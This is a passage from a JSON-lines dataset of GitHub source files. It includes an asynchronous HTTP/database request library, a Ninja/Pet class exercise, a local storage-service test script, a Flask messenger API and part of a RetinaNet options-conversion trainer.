response\n\tif response.status_code not in (301, 302, 307, 308):\n\t\treturn response\n\n\tnewloc = response.get_header ('location')\n\toldloc = response.request.uri\n\trequest = response.request\n\n\tif newloc == oldloc:\n\t\tresponse.response = http_response.FailedResponse (711, \"Redirect Error\", request)\n\t\treturn response\n\n\ttry:\n\t\trequest.relocate (response.response, newloc)\n\texcept RuntimeError:\n\t\tresponse.response = http_response.FailedResponse (711, \"Redirect Error\", request)\n\t\treturn response\n\n\t#_logger (\"%s redirected to %s from %s\" % (response.status_code, newloc, oldloc), \"info\")\n\t# DO NOT use relocated response.request, it is None\n\t_reque_first (request)\n\ndef _request_finished (handler):\n\tglobal _cb_gateway, _currents, _concurrent, _finished_total, _logger, _bytesrecv,_force_h1\n\tglobal _http_status, _http_version\n\n\treq_id = handler.request.meta ['req_id']\n\ttry:\n\t\t_currents.pop (req_id)\n\texcept KeyError:\n\t\tpass\n\n\tif isinstance (handler, dbo_request.Request):\n\t\tresponse = handler\n\n\telse:\n\t\tresponse = response_builder.HTTPResponse (handler.response)\n\n\t\ttry:\n\t\t\tfor handle_func in (handle_status_401, handle_status_3xx):\n\t\t\t\tresponse = handle_func (response)\n\t\t\t\tif not response:\n\t\t\t\t\t# re-requested\n\t\t\t\t\treturn req_if_queue (req_id)\n\t\texcept:\n\t\t\t_logger.trace ()\n\n\t_finished_total += 1\n\tresponse.logger = _logger\n\t_bytesrecv += len (response.content)\n\n\ttry: _http_status [response.status_code] += 1\n\texcept KeyError: _http_status [response.status_code] = 1\n\ttry: _http_version [response.version] += 1\n\texcept KeyError: _http_version [response.version] = 1\n\n\tcallback = response.meta ['req_callback'] or _cb_gateway\n\ttry:\n\t\tcallback (response)\n\texcept:\n\t\t_logger.trace ()\n\n\treq_if_queue (req_id)\n\ndef req_if_queue (req_id):\n\tglobal _logger, _currents\n\n\ttry:\n\t\tqsize () and _req ()\n\texcept RecursionError:\n\t\ttry:\n\t\t\t_currents.pop (req_id)\n\t\texcept KeyError:\n\t\t\tpass\n\t\t_logger (\"too many error occured, failed requeueing\", \"fail\")\n\ndef _req ():\n\tglobal _que, _logger, _currents, _request_total, _backend\n\targs = _que.get ()\n\n\tif args is None:\n\t\treturn\n\n\t_request_total += 1\n\t_is_request = False\n\t_is_db = False\n\t_method = None\n\n\tif type (args) is not tuple:\n\t\treq = args\n\t\tmeta = req.meta\n\t\t_is_request = True\n\t\t_is_db = hasattr (req, 'dbtype')\n\n\telse:\n\t\t_is_request = False\n\t\t_method = args [0].lower ()\n\n\tif _is_db or _method in (\"postgresql\", \"redis\", \"mongodb\", \"sqlite3\"):\n\t\tif not _is_request:\n\t\t\tmethod, server, (dbmethod, params), dbname, auth, meta = args\n\t\t\tasyncon = dbpool.get (server, dbname, auth, \"*\" + _method)\n\t\t\treq = request_builder.make_dbo (_method, server, dbmethod, params, dbname, auth, meta, _logger)\n\t\telse:\n\t\t\tasyncon = dbpool.get (req.server, req.dbname, req.auth, \"*\" + req.dbtype)\n\n\t\t_currents [meta ['req_id']] = [0, req.server]\n\t\treq.set_callback (_request_finished)\n\t\tasyncon.execute (req)\n\n\telse:\n\t\tif not _is_request:\n\t\t\tmethod, url, params, auth, headers, meta, proxy = args\n\t\t\tasyncon = socketpool.get (url)\n\t\t\tif _method in (\"ws\", \"wss\"):\n\t\t\t\treq = request_builder.make_ws (_method, url, params, auth, headers, meta, proxy, _logger)\n\t\t\telse:\n\t\t\t\treq = request_builder.make_http (_method, url, params, auth, headers, meta, proxy, _logger)\n\n\t\telse:\n\t\t\tasyncon = socketpool.get 
(req.uri)\n\n\t\t_currents [meta ['req_id']] = [0, req.uri]\n\t\thandler = req.handler (asyncon, req, _request_finished)\n\t\tif asyncon.get_proto () and asyncon.isconnected ():\n\t\t\tasyncon.handler.handle_request (handler)\n\t\telse:\n\t\t\thandler.handle_request ()\n\ndef workings ():\n\tglobal _currents\n\treturn len (_currents)\n\ndef countreq ():\n\tglobal _request_total\n\treturn _request_total\n\ndef qsize ():\n\tglobal _que\n\treturn _que.qsize ()\n\ndef mapsize ():\n\treturn len (asyncore.socket_map)\n\ndef countfin ():\n\tglobal _finished_total\n\treturn _finished_total\n\ndef countcli ():\n\tglobal _currents\n\treturn _currents\n\ndef concurrent ():\n\tglobal _concurrent\n\treturn _concurrent\n\ndef fetchall ():\n\tglobal _workers, _logger, _que, _timeout, _max_conns, _bytesrecv, _concurrent, _finished_total, _force_h1, _request_total\n\tglobal result, _http_status, _http_version\n\n\tif not qsize ():\n\t\t_logger.log ('no item in queue.')\n\t\treturn\n\n\tif not _initialized:\n\t\tconfigure ()\n\n\t_fetch_started = timeit.default_timer ()\n\t# IMP. manually set\n\tlifetime._polling = 1\n\n\t# create initial workers\n\t#_logger (\"creating connection pool\", \"info\")\n\ttarget_socks = min (_workers, qsize ())\n\tfor i in range (target_socks):\n\t\t_req ()\n\n\tselect_timeout = 1.0\n\tif not _force_h1 and http2.MAX_HTTP2_CONCURRENT_STREAMS > 1:\n\t\t# wait until all connections are available\n\t\twhile qsize ():\n\t\t\tlifetime.lifetime_loop (select_timeout, 1)\n\t\t\ttarget_socks = sum ([1 for conn in asyncore.socket_map.values () if hasattr (conn, \"get_proto\") and not isinstance (conn, (dns.UDPClient, dns.TCPClient)) and conn.get_proto () in H2_PROTOCOLS and conn.connected and not conn.isactive ()])\n\t\t\tif target_socks == _workers:\n\t\t\t\t#_logger ('%d connection(s) created' % target_socks, 'info')\n\t\t\t\tbreak\n\n\t# now starting\n\tif http2.MAX_HTTP2_CONCURRENT_STREAMS == 1:\n\t\tmeasurement = min\n\telse:\n\t\tmeasurement = max\n\n\twhile qsize () or _currents:\n\t\tlifetime.lifetime_loop (select_timeout, 1)\n\t\twhile _concurrent > measurement (len (_currents), mapsize ()) and qsize ():\n\t\t\t_req ()\n\t\t\t_max_conns = max (_max_conns, mapsize ())\n\t\t#print ('--', len (_currents), mapsize (), qsize ())\n\t\tif not mapsize ():\n\t\t\tbreak\n\n\tlifetime._polling = 0\n\t_duration = timeit.default_timer () - _fetch_started\n\tsocketpool.cleanup ()\n\tdbpool.cleanup ()\n\tresult = Result (_finished_total, _duration, _bytesrecv, _max_conns, copy.copy (_http_status), copy.copy (_http_version))\n\n\t# reinit for next session\n\t_request_total = 0\n\t_finished_total = 0\n\t_max_conns = 0\n\t_bytesrecv = 0\n\t_http_status = {}\n\t_http_version = {}\n\nclass Result:\n\tdef __init__ (self, tasks, duration, bytes_recv, max_conns, _http_status, _http_version):\n\t\tself.tasks = tasks\n\t\tself.duration = duration\n\t\tself.bytes_recv = bytes_recv\n\t\tself.max_conns = max_conns\n\t\tself._http_status = _http_status\n\t\tself._http_version = _http_version\n\n\tdef report (self):\n\t\tprint (tc.debug (\"summary\"))\n\t\tprint (\"- finished in: {:.2f} seconds\".format (self.duration))\n\t\tprint (\"- requests: {:,} requests\".format (self.tasks))\n\t\tprint (\"- requests/sec: {:.2f} requests\".format (self.tasks / self.duration))\n\t\tprint (\"- bytes received: {:,} bytes\".format (self.bytes_recv))\n\t\tprint (\"- bytes received/sec: {:,} bytes\".format (int (self.bytes_recv / self.duration)))\n\n\t\tprint (tc.debug (\"response status codes\"))\n\t\tfor k, v in 
sorted (self._http_status.items ()):\n\t\t\tprint (\"- {}: {:,}\".format (k, v))\n\t\tprint (tc.debug (\"response HTTP versions\"))\n\t\tfor k, v in sorted (self._http_version.items ()):\n\t\t\tprint (\"- {}: {:,}\".format (k, v))\n\n\ndef suspend (timeout):\n\ta, b = math.modf (timeout)\n\tfor i in range (int (b)):\n\t\tsocketpool.noop ()\n\t\ttime.sleep (1)\n\ttime.sleep (a)\n\n_dns_reqs = 0\ndef _add (method, url, params = None, auth = None, headers = {}, callback = None, meta = None, proxy = None):\n\tglobal _que, _initialized, _dns_query_req, _dns_reqs, _workers\n\n\tif not _initialized:\n\t\tconfigure ()\n\n\tif not meta:\n\t\tmeta = {}\n\n\tmeta ['req_id'] = _que.req_id\n\tmeta ['req_method'] = method\n\tmeta ['req_callback'] = callback\n\t_que.add ((method, url, params, auth, headers, meta, proxy))\n\n\t# DNS pre-query for caching and massive request sets\n\tif not lifetime._polling and _dns_reqs < _workers:\n\t\thost = urlparse (url) [1].split (\":\")[0]\n\t\tif host not in _dns_query_req:\n\t\t\t_dns_query_req [host] = None\n\t\t\t_dns_reqs += 1\n\t\t\tadns.query (host, \"A\", callback = lambda x: None)\n\n\t\tif dns.qsize ():\n\t\t\tdns.pop_all ()\n\t\t\tasyncore.loop (0.1, count = 2)\n\t#print ('~~~~~~~~~~~~~~~', asyndns.pool.connections)\n\n\ndef log (msg, type = \"info\"):\n\tglobal _logger\n\t_logger (msg, type)\n\n#----------------------------------------------------\n# Add Request (protocols.*.request) Object\n#----------------------------------------------------\ndef add (request):\n\tglobal _que\n\t_que.add (request)\n\n#----------------------------------------------------\n# HTTP CALL\n#----------------------------------------------------\ndef head (*args, **karg):\n\t_add ('head', *args, **karg)\n\ndef trace (*args, **karg):\n\t_add ('trace', *args, **karg)\n\ndef options (*args, **karg):\n\t_add ('options', *args, **karg)\n\ndef upload (*args, **karg):\n\t_add ('upload', *args, **karg)\n\ndef get (*args, **karg):\n\t_add ('get', *args, **karg)\n\ndef delete (*args, **karg):\n\t_add ('delete', *args, **karg)\n\ndef post (*args, **karg):\n\t_add ('post', *args, **karg)\n\ndef patch (*args, **karg):\n\t_add ('patch', *args, **karg)\n\ndef put (*args, **karg):\n\t_add ('put', *args, **karg)\n\n\ndef getjson (*args, **karg):\n\t_add ('getjson', *args, **karg)\n\ndef deletejson (*args, **karg):\n\t_add ('deletejson', *args, **karg)\n\ndef patchjson (*args, **karg):\n\t_add ('patchjson', *args, **karg)\n\ndef postjson (*args, **karg):\n\t_add ('postjson', *args, **karg)\n\ndef putjson (*args, **karg):\n\t_add ('putjson', *args, **karg)\n\n\ndef getxml (*args, **karg):\n\t_add ('getxml', *args, **karg)\n\ndef deletexml (*args, **karg):\n\t_add ('deletexml', *args, **karg)\n\ndef patchxml (*args, **karg):\n\t_add ('patchxml', *args, **karg)\n\ndef postxml (*args, **karg):\n\t_add ('postxml', *args, **karg)\n\ndef putxml (*args, **karg):\n\t_add ('putxml', *args, **karg)\n\n\n#----------------------------------------------------\n# Websocket\n#----------------------------------------------------\ndef ws (*args, **karg):\n\t_add ('ws', *args, **karg)\n\ndef wss (*args, **karg):\n\t_add ('wss', *args, **karg)\n\n\n#----------------------------------------------------\n# XMLRPC, gRPC\n#----------------------------------------------------\ndef _addrpc (method, rpcmethod, params, url, auth = None, headers = {}, callback = None, meta = {}, proxy = None):\n\t_add (method, url, (rpcmethod, params), auth, headers, callback, meta, proxy)\n\ndef rpc (*args, **karg):\n\treturn stubproxy.Proxy ('rpc', 
_addrpc, *args, **karg)\n\ndef jsonrpc (*args, **karg):\n\treturn stubproxy.Proxy ('jsonrpc', _addrpc, *args, **karg)\n\ndef grpc (*args, **karg):\n\treturn stubproxy.Proxy ('grpc', _addrpc, *args, **karg)\n\n#----------------------------------------------------\n# DBO QUERY\n#----------------------------------------------------\ndef _adddbo (method, dbmethod, params, server, dbname = None, auth = None, callback = None, meta = {}):\n\tglobal _que\n\n\tif not _initialized:\n\t\tconfigure ()\n\tif not meta: meta = {}\n\tmeta ['req_id'] = _que.req_id\n\tmeta ['req_method'] = method\n\tmeta ['req_callback'] = callback\n\n\t_que.add ((method, server, (dbmethod, params), dbname, auth, meta))\n\ndef postgresql (*args, **karg):\n\treturn stubproxy.Proxy ('postgresql', _adddbo, *args, **karg)\npgsql = pg = postgresql\n\ndef redis (*args, **karg):\n\treturn stubproxy.Proxy ('redis', _adddbo, *args, **karg)\n\ndef mongodb (*args, **karg):\n\treturn stubproxy.Proxy ('mongodb', _adddbo, *args, **karg)\n\ndef sqlite3 (*args, **karg):\n\treturn stubproxy.Proxy ('sqlite3', _adddbo, *args, **karg)\n\n","repo_name":"hansroh/aquests","sub_path":"aquests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14635,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"}
+{"seq_id":"35638237582","text":"from pet import Pet\n\nclass Ninja:\n    def __init__(self,first_name,last_name,pet,treats):\n        self.first_name = first_name\n        self.last_name = last_name\n        self.pet = pet\n        self.treats = treats\n        self.pet_food = 80\n    \n    def walk(self):\n        self.pet.play()\n        return self\n    \n    def feed(self):\n        if (self.pet_food > 0):\n            self.pet_food -= 50 \n            self.pet.eat()\n        \n        else:\n            print(\"Sorry, no food for you\")\n        return self\n    \n    def bathe(self):\n        self.pet.noises()\n        return self\n    \n    \n\n\nlola = Pet(\"Lola\", \"Dog\",\"all of them\",\"bark\")\nprint(lola.name)\nsam = Ninja(\"Sam\",\"Ghanem\",lola,\"bully sticks\")\nsam.feed()\nprint(lola.health)\nprint(lola.energy)\n\nsam.bathe()\n\nsam.feed()\nprint(lola.health)\nprint(lola.energy)\n\nsam.walk()\nprint(lola.health)\nprint(lola.energy)","repo_name":"SamGhanem/python","sub_path":"dojo_pets/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"13332980773","text":"# PREREQUISITES:\n# Need stord to be started with ha port 9000\n#./src/stord/./stord -etcd_ip=\"http://127.0.0.1:2379\" -stord_version=\"v1.0\" -svc_label=\"stord_svc\" -ha_svc_port=9000\n# Need tgtd to be started with ha port 9001\n#./usr/tgtd -f -e \"http://127.0.0.1:2379\" -s \"tgt_svc\" -v \"v1.0\" -p 9001 -D \"127.0.0.1\" -P 9876\n\nimport json\nimport requests\nimport time\nimport sys\nimport os\n\nfrom collections import OrderedDict\nfrom urllib.parse import urlencode\n\nh = \"http\"\ncert = None\n\nAeroClusterID=\"1\"\nTargetName=\"tgt1\"\nTargetName_D=\"%s\" %TargetName\n\nVmId=\"1\"\nVmdkID=\"2\"\nTargetID=\"%s\" %VmId\nLunID=\"%s\" %VmdkID\nFileTarget=\"/tmp/hyc/\"\ncreatefile=\"false\"\nDevTarget=\"/dev/sde\"\n\nsize_in_gb=\"1\" #Size in GB\nsize_in_bytes=int(size_in_gb) * int(1024) * int(1024) * int(1024)\n\nDevName=\"iscsi-%s-disk_%s\" %(TargetName, LunID)\nDevPath=\"/var/hyc/%s\" %(DevName)\ncmd=\"truncate --size=%sG %s\" %(size_in_gb, DevPath)\n\nprint (\"DevPath: %s\" %DevPath)\nprint (\"Cmd: %s\" %cmd)\nos.system(cmd)\n\nif len(sys.argv) > 1:\n    if sys.argv[1].lower() == \"https\" :\n        import urllib3\n        
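# added note: the REST calls below are sent with verify=False against a local self-signed cert pair, so suppress urllib3's InsecureRequestWarning\n        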
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n h = \"https\"\n cert=('./cert/cert.pem', './cert/key.pem')\n\nheaders = {'Content-type': 'application/json'}\nparams = OrderedDict([('first', 1), ('second', 2), ('third', 3)])\ndata = { \"service_type\": \"test_server\", \"service_instance\" : 0, \"etcd_ips\" : [\"3213213\", \"213213\"]}\n\n# POST call 3 to stord_svc\nprint (\"Send POST stord_svc new_vmdk 1\")\nparent = False\nif parent == True:\n\tdata2 = {\"TargetID\":\"%s\" %TargetID,\"LunID\":\"%s\" %LunID,\"DevPath\":\"%s\" %DevPath,\"VmID\":\"%s\" %VmId, \"VmdkID\":\"%s\" %VmdkID,\"BlockSize\":\"4096\", \"ParentDiskName\":\"set10\", \"ParentDiskVmdkID\" : \"12\", \"Compression\":{\"Enabled\":\"false\"},\"Encryption\":{\"Enabled\":\"false\"},\"RamCache\":{\"Enabled\":\"false\",\"MemoryInMB\":\"1024\"},\"FileCache\":{\"Enabled\":\"false\"},\"SuccessHandler\":{\"Enabled\":\"false\"}, \"FileTarget\":{\"Enabled\":\"true\",\"CreateFile\":\"%s\" %createfile, \"TargetFilePath\":\"%s\" %DevTarget,\"TargetFileSize\":\"%s\" %size_in_bytes}, \"CleanupOnWrite\":\"true\"}\nelse:\n\tdata2 = {\"TargetID\":\"%s\" %TargetID,\"LunID\":\"%s\" %LunID,\"DevPath\":\"%s\" %DevPath,\"VmID\":\"%s\" %VmId, \"VmdkID\":\"%s\" %VmdkID,\"BlockSize\":\"4096\", \"Compression\":{\"Enabled\":\"false\"},\"Encryption\":{\"Enabled\":\"false\"},\"RamCache\":{\"Enabled\":\"false\",\"MemoryInMB\":\"1024\"},\"FileCache\":{\"Enabled\":\"false\"},\"SuccessHandler\":{\"Enabled\":\"false\"}, \"FileTarget\":{\"Enabled\":\"true\",\"CreateFile\":\"%s\" %createfile, \"TargetFilePath\":\"%s\" %DevTarget,\"TargetFileSize\":\"%s\" %size_in_bytes}, \"CleanupOnWrite\":\"true\"}\n\nr = requests.post(\"%s://127.0.0.1:9000/stord_svc/v1.0/new_vmdk/?vm-id=%s&vmdk-id=%s\" % (h,VmId,VmdkID), data=json.dumps(data2), headers=headers, cert=cert, verify=False)\nassert (r.status_code == 200)\n\n# POST call 5 to tgt_svc\nprint (\"Send POST tgt_svc lun_create %s\" %LunID)\ndata2 = {\"DevName\": \"%s\" %(DevName), \"VmID\":\"%s\" %VmId, \"VmdkID\":\"%s\" %VmdkID, \"LunSize\":\"%s\" %size_in_gb}\nr = requests.post(\"%s://127.0.0.1:9001/tgt_svc/v1.0/lun_create/?tid=%s&lid=%s\" % (h, TargetID, LunID), data=json.dumps(data2), headers=headers, cert=cert, verify=False)\nassert (r.status_code == 200)\n","repo_name":"CacheboxInc/tgt-test-tool","sub_path":"src/tests/utils/add_lun.py","file_name":"add_lun.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40108358390","text":"import json\nfrom types import SimpleNamespace\n\ndef make_config(json_string):\n config = json.loads(json_string, object_hook=lambda d: SimpleNamespace(**d))\n config.name = f'{config.activation}_{config.solver}_{config.limit}'\n config.model_save = f\"./{config.target}/model_{config.name}.bin\"\n config.data_dir = f'./{config.target}/data'\n config.dataset_save = f'./{config.target}/dataset_{config.name}.bin'\n return config\n","repo_name":"erikschmutz/kex","sub_path":"backend-app/scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"10937538463","text":"\"\"\"Comcat messenger.\"\"\"\n\nfrom flask import request\n\nfrom ccmessenger import get_customer_message\nfrom ccmessenger import get_customer_messages\nfrom ccmessenger import get_user_message\nfrom ccmessenger import get_user_messages\nfrom ccmessenger import 
CustomerMessage\nfrom ccmessenger import UserMessage\nfrom his import CUSTOMER, authenticated, authorized\nfrom wsgilib import JSON, JSONMessage\n\nfrom dscms4.comcat.functions import get_user\nfrom dscms4.fcm import notify_customer_message\n\n\n__all__ = [\"ROUTES\"]\n\n\n@authenticated\n@authorized(\"comcat\")\ndef sent_messages() -> JSON:\n \"\"\"Lists sent messages.\"\"\"\n\n return JSON(\n [message.to_json() for message in get_customer_messages(sender=CUSTOMER.id)]\n )\n\n\n@authenticated\n@authorized(\"comcat\")\ndef received_messages() -> JSON:\n \"\"\"Lists received messages.\"\"\"\n\n return JSON(\n [message.to_json() for message in get_user_messages(recipient=CUSTOMER.id)]\n )\n\n\n@authenticated\n@authorized(\"comcat\")\ndef show_conversation(user: int) -> JSON:\n \"\"\"Shows the conversation with a user.\"\"\"\n\n return JSON(\n [\n message.to_json()\n for message in get_user_messages(sender=user, recipient=CUSTOMER.id)\n ]\n )\n\n\n@authenticated\n@authorized(\"comcat\")\ndef send_message() -> JSONMessage:\n \"\"\"Write a new message.\"\"\"\n\n message = CustomerMessage(\n sender=CUSTOMER.id,\n recipient=get_user(request.json.get(\"user\"), CUSTOMER.id),\n text=request.json[\"text\"],\n )\n message.save()\n notify_customer_message(message)\n return JSONMessage(\"Message sent.\", id=message.id, status=201)\n\n\n@authenticated\n@authorized(\"comcat\")\ndef delete_own_message(ident: int) -> JSONMessage:\n \"\"\"Deletes a sent message.\"\"\"\n\n try:\n message = get_customer_message(ident, sender=CUSTOMER.id)\n except CustomerMessage.DoesNotExist:\n return JSONMessage(\"No such message.\", status=404)\n\n message.delete_instance()\n return JSONMessage(\"Message deleted.\", status=200)\n\n\n@authenticated\n@authorized(\"comcat\")\ndef delete_user_message(ident: int) -> JSONMessage:\n \"\"\"Deletes a user message.\"\"\"\n\n try:\n message = get_user_message(ident, recipient=CUSTOMER.id)\n except UserMessage.DoesNotExist:\n return JSONMessage(\"No such message.\", status=404)\n\n message.delete_instance()\n return JSONMessage(\"Message deleted.\", status=200)\n\n\nROUTES = [\n ([\"GET\"], \"/messenger/sent\", sent_messages),\n ([\"GET\"], \"/messenger/received\", received_messages),\n ([\"GET\"], \"/messenger/conversation/\", show_conversation),\n ([\"POST\"], \"/messenger/send\", send_message),\n ([\"DELETE\"], \"/messenger/delete-own/\", delete_own_message),\n ([\"DELETE\"], \"/messenger/delete-user-msg/\", delete_user_message),\n]\n","repo_name":"homeinfogmbh/dscms4","sub_path":"dscms4/comcat/messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2433552774","text":"'''\n RetinaNet trainer for PyTorch.\n\n 2019-21 Benjamin Kellenberger\n'''\n\nimport io\nimport json\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom ..genericPyTorchModel import GenericPyTorchModel\n\nfrom ..functional._retinanet import DEFAULT_OPTIONS, collation, encoder, loss\nfrom ..functional._retinanet.model import RetinaNet as Model\nfrom ..functional.datasets.bboxDataset import BoundingBoxesDataset\nfrom util.helpers import get_class_executable\nfrom util import optionsHelper\n\n\n'''\n Map between new (GUI-enhanced) and old options JSON format fields.\n In the new format, all options are rooted under \"options\".\n'''\nOPTIONS_MAPPING = {\n 'general.device.value': 'general.device',\n 'general.seed.value': 'general.seed',\n 
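# added note: the keys below map model-construction kwargs, which the old flat scheme nested under model.kwargs\n    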
'model.backbone.value': 'model.kwargs.backbone',\n 'model.pretrained.value': 'model.kwargs.pretrained',\n 'model.out_planes.value': 'model.kwargs.out_planes',\n 'model.convertToInstanceNorm.value': 'model.kwargs.convertToInstanceNorm',\n 'train.dataLoader.shuffle.value': 'train.dataLoader.kwargs.shuffle',\n 'train.dataLoader.batch_size.value': 'train.dataLoader.kwargs.batch_size',\n 'train.criterion.gamma.value': 'train.criterion.kwargs.gamma',\n 'train.criterion.alpha.value': 'train.criterion.kwargs.alpha',\n 'train.criterion.background_weight.value': 'train.criterion.kwargs.background_weight',\n 'train.ignore_unsure': 'train.ignore_unsure',\n 'inference.dataLoader.batch_size.value': 'inference.dataLoader.kwargs.batch_size'\n\n # optimizer and transforms are treated separately\n}\n\n\nclass RetinaNet(GenericPyTorchModel):\n\n model_class = Model\n\n def __init__(self, project, config, dbConnector, fileServer, options):\n super(RetinaNet, self).__init__(project, config, dbConnector, fileServer, options)\n\n self.model_class = Model\n\n\n ''' Model options parsing and verification functionalities '''\n\n @staticmethod\n def getDefaultOptions():\n jsonFile = 'config/ai/model/pytorch/boundingBoxes/retinanet.json'\n try:\n # try to load defaults from JSON file first\n options = json.load(open(jsonFile, 'r'))\n except Exception as e:\n # error; fall back to built-in defaults\n print(f'Error reading default RetinaNet options file \"{jsonFile}\" (message: \"{str(e)}\"), falling back to built-in options.')\n options = DEFAULT_OPTIONS\n \n # expand options\n options = optionsHelper.substitute_definitions(options)\n\n return options\n\n\n @staticmethod\n def _convertOldOptions(options, defaults):\n '''\n Receives options in the previous JSON encoding\n and converts them to the new GUI-enhanced scheme.\n Returns the new, converted options accordingly.\n '''\n newOptions = defaults.copy()\n\n warnings = []\n \n # update defaults key by key\n for key in OPTIONS_MAPPING.keys():\n newTokens = ['options']\n newTokens.extend(key.split('.'))\n oldTokens = OPTIONS_MAPPING[key].split('.')\n oldValue = optionsHelper.get_hierarchical_value(options, oldTokens, None)\n if oldValue is None:\n warnings.append(f'Value for options \"{key}\" could not be found in given options (expected location: \"{OPTIONS_MAPPING[key]}\").')\n else:\n optionsHelper.set_hierarchical_value(newOptions, newTokens, oldValue)\n\n # take special care of the optimizer: try all possible values (only the ones present will be retained)\n currentOptimType = options['train']['optim']['class']\n optionsHelper.set_hierarchical_value(newOptions, ('train','optim','value'), currentOptimType)\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'lr','value'), ('train', 'optim', 'kwargs', 'lr'))\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'weight_decay','value'), ('train', 'optim', 'kwargs', 'weight_decay'))\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'momentum','value'), ('train', 'optim', 'kwargs', 'momentum'))\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'alpha','value'), ('train', 'optim', 'kwargs', 'alpha'))\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'centered','value'), ('train', 'optim', 'kwargs', 'centered'))\n 
optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'dampening','value'), ('train', 'optim', 'kwargs', 'dampening'))\n        optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'nesterov','value'), ('train', 'optim', 'kwargs', 'nesterov'))\n\n        # also take special care of the transforms\n        def _update_transforms(currentTransforms):\n            newTransforms = []\n            for tr in currentTransforms:\n                # get from template definition and then replace values\n                trClass = tr['class']\n                if trClass not in newOptions['defs']['transform']:\n                    warnings.append(f'Transform \"{trClass}\" is not defined in the new scheme and will be skipped.')\n                    continue\n                newTr = newOptions['defs']['transform'][trClass]\n                for kw in tr['kwargs'].keys():\n                    if kw == 'size':\n                        newTr['width']['value'] = tr['kwargs']['size'][0]\n                        newTr['height']['value'] = tr['kwargs']['size'][1]\n                    elif kw in ('brightness', 'contrast', 'saturation', 'hue'):\n                        newTr[kw]['minV']['value'] = 0\n                        newTr[kw]['maxV']['value'] = tr['kwargs'][kw]\n                        warnings.append(f'{kw} values of transforms have been set as maximums (min: 0).')\n                    elif kw in ('mean', 'std'):\n                        newTr['mean']['r'] = tr['kwargs'][kw][0]\n                        newTr['mean']['g'] = tr['kwargs'][kw][1]\n                        newTr['mean']['b'] = tr['kwargs'][kw][2]\n                    elif kw in newTr:\n                        newTr[kw]['value'] = tr['kwargs'][kw]\n                newTransforms.append(newTr)\n            return newTransforms\n\n        currentTr_train = options['train']['transform']['kwargs']['transforms']\n        newTr_train = _update_transforms(currentTr_train)\n        newOptions['options']['train']['transform']['value'] = newTr_train\n\n        currentTr_inference = options['inference']['transform']['kwargs']['transforms']\n        newTr_inference = _update_transforms(currentTr_inference)\n        newOptions['options']['inference']['transform']['value'] = newTr_inference\n\n        print('Old RetinaNet options successfully converted to new format.')\n        return newOptions, warnings\n    \n\n    @staticmethod\n    def _verify_transforms(transforms, allowGeometric=True):\n        warnings, errors = [], []\n        transforms_PIL_new, transforms_tensor_new = [], []\n        currentInputType = None # to keep track of transform order\n        for tr in transforms:\n            if isinstance(tr, str):\n                # only an ID provided; encapsulate\n                warnings.append(f'Using default arguments for transform \"{tr}\"')\n                tr = {\n                    'id': tr\n                }\n            trID = tr['id']\n            trName = (tr['name'] if 'name' in tr else trID)\n            \n            if trID == 'ai.models.pytorch.boundingBoxes.DefaultTransform':\n                if 'transform' in tr:\n                    newTr, newWarn, newErr = RetinaNet._verify_transforms(\n                        [tr['transform']], allowGeometric)\n                    transforms_PIL_new.extend(newTr) #TODO: Compose could contain mixed transforms\n                    warnings.extend(newWarn)\n                    errors.extend(newErr)\n                else:\n                    warnings.append(f'Default transform \"{trName}\" contains no sub-transform and will be skipped.')\n\n            elif trID == 'ai.models.pytorch.boundingBoxes.Compose':\n                if 'transforms' in tr:\n                    newTr, newWarn, newErr = RetinaNet._verify_transforms(\n                        tr['transforms'], allowGeometric)\n                    transforms_PIL_new.extend(newTr) #TODO: Compose could contain mixed transforms\n                    warnings.extend(newWarn)\n                    errors.extend(newErr)\n                else:\n                    warnings.append(f'Compose transform \"{trName}\" contains no sub-transforms and will be skipped.')\n\n            if trID in (\n                'torchvision.transforms.Normalize',\n                'torchvision.transforms.RandomErasing'\n            ):\n                # transforms on torch.tensor; these come at the end\n                transforms_tensor_new.append({\n                    'id': 'ai.models.pytorch.boundingBoxes.DefaultTransform',\n                    'transform': 
tr\n })\n if currentInputType is not None and currentInputType != 'tensor':\n warnings.append(f'Transform \"{trName}\" operates on Torch.tensor, but current input is PIL.Image. Transforms might be reordered.')\n currentInputType = 'tensor'\n\n elif trID in (\n 'ai.models.pytorch.boundingBoxes.RandomHorizontalFlip',\n 'ai.models.pytorch.boundingBoxes.RandomFlip'\n ):\n # geometric transforms on PIL.Image\n if not allowGeometric:\n warnings.append(f'Transform \"{trName}\" modifies the image geometrically, which is not allowed here. The transform is being skipped.')\n continue\n transforms_PIL_new.append(tr)\n if currentInputType is not None and currentInputType != 'image':\n warnings.append(f'Transform \"{trName}\" operates on PIL images, but current input is Torch.tensor. Transforms might be reordered.')\n currentInputType = 'image'\n \n elif trID in (\n 'ai.models.pytorch.boundingBoxes.Resize',\n 'torchvision.transforms.ColorJitter',\n 'torchvision.transforms.Grayscale',\n 'torchvision.transforms.RandomGrayscale'\n ):\n # non-geometric (+ always allowed resize) transforms on PIL.Image\n transforms_PIL_new.append({\n 'id': 'ai.models.pytorch.boundingBoxes.DefaultTransform',\n 'transform': tr\n })\n if currentInputType is not None and currentInputType != 'image':\n warnings.append(f'Transform \"{trName}\" operates on 